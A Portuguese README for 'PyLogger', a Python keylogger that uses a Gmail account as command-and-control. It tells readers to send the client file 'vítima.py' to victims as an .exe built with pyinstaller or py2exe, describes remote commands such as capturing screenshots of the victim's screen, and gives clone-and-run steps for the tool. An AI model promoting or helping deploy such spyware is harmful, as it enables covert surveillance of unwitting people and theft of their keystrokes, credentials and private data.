# PyLogger como nome já diz é um Keylogger em Python. PyLogger vem com um cliente chamado vítima.py a qual deve-se enviar para as vítimas. PyLogger utiliza o Gmail como C&C, sendo assim basta ter uma conta no Gmail para ter acesso a hosts em rede externa e receber os comandos de controle sobre a máquina da vítima digitados no terminal por email,como o comando de screenshot da tela da vítima, que mesmo sendo salvo na sua máquina com os comandos -id id da vítima e -jobid e o jobid que foi gerado com os comandos -id id da vítima -screenshot direto no email.
Deve-se enviar para as vitimas como arquivo executável .exe, a conversão de .py para .exe pode ser feito usando pyinstaller ou através do site http://py2exe.net


<a href="http://pt-br.tinypic.com?ref=7131qf" target="_blank"><img src="http://i63.tinypic.com/7131qf.png" border="0" alt="Image and video hosting by TinyPic"></a>

Modo de download e execução do script:
git clone https://github.com/anonymouskillerbr1/PyLogger.git

cd PyLogger

unzip PyLogger.zip


cd PyLogger

chmod +x pylogger.py

chmod +x vitima.py

python2 pylogger.py
